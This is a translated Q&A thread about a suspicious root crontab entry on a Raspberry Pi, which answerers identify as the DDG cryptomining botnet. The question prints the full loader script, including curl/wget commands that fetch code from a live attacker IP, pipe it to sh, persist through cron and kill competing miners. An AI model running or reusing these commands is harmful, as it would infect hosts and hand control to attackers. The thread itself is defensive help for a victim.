可疑的crontab条目每15分钟运行一次“ xribfa4”


59

我想在Raspberry Pi上的根crontab文件中添加一些内容,但发现一个对我来说似乎可疑的条目,在Google上搜索它的部分内容没有任何结果。

Crontab条目:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

的内容http://103.219.112.66:8000/i.sh是:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

我的Linux知识是有限的,但是对我来说,从印尼服务器下载二进制文件并定期以root用户身份运行它们并不是很平常的事情。

这是什么?我该怎么办?


16
它是圆形的。每隔15分钟,它会下载并安装一个新的副本。如果/当更改远程服务器上的副本时,所有运行此cronjob的服务器将在15分钟内执行新代码。
通配符

5
您的树莓派可以上网吗?您的树莓派正在运行什么?当我搜索xribfa4时,这是Google上唯一的结果。如果您没有运行需要执行此操作的软件,则可能是病毒。
kemotep

6
@kemotep该字符串是随机的,但是google为IP,它给出了一些结果。关于ddg僵尸网络的事
frostschutz

9
我找到了。知识产权在印度尼西亚政府站点上注册非常疯狂。看起来也有将近2000个其他ip传送此有效负载。
kemotep

21
您必须意识到的主要事情是,即使删除了该crontab条目,您的系统也很可能仍然具有允许其被感染的漏洞。您需要找到并修复该漏洞。
Hans-Martin Mosner

Answers:


79

这是一个DDG挖矿僵尸网络,它是如何工作的:

  1. 利用RCE漏洞
  2. 修改crontab
  3. 下载适当的挖掘程序(用go编写)
  4. 开始采矿过程

DDG:针对数据库服务器的采矿僵尸网络

一个僵尸网络借用另一个僵尸网络的基础架构时的SystemdMiner

U&L:如何在AWS EC2实例上杀死恶意软件?(受损的服务器)


4
是的,实际上看起来就是这样。谢谢!如果没有新消息出现,它将标记为答案。
Peter Dam

8
不要忘记针对有根机器的通常建议:尝试弄清楚它们是如何进入的,以便您可以修复孔。从中学到东西,并提高您的安全性。最后,核对并重新安装计算机。
marcelm

3
好消息是,他们似乎没有为Pi配备矿机,仅为i686和x86_64。
标记

13
@Mark这是个好消息吗?有人使用未知入口点完全控制了他的Pi,并且可以完全访问Pi上的所有机密信息(包括但不限于密码)。矿工是否真的在“小麻烦”的境地。
marcelm

4
@marcelm,攻击者获得了对其的完全控制,然后几乎可以肯定的是对该控制没有做任何重要的事情。
马克

2

找出实际需要哪些TCP和UDP端口,然后阻止路由器防火墙中的所有其他端口。可能不会再次显示这些crontab条目。

您可以使用Shields Up查看哪些端口是开放的和公用的在grc.com上提供功能


5
或者他可以修补此漏洞。
哈珀-恢复莫妮卡

1
@Harper绝对!那是给定的。我在想,也许不先阻止未使用的端口,在他尝试对其进行修补时,它可能会被重新感染。
Mike Waters


1
总是这样(但不仅限于TCP和UDP)。可靠的安全模型,白名单或默认拒绝(拒绝您不明确使用或不需要的所有流量)是确保您的所有漏洞都不被渗透的唯一方法。
antichris
By using our site, you acknowledge that you have read and understand our Cookie Policy and Privacy Policy.
Licensed under cc by-sa 3.0 with attribution required.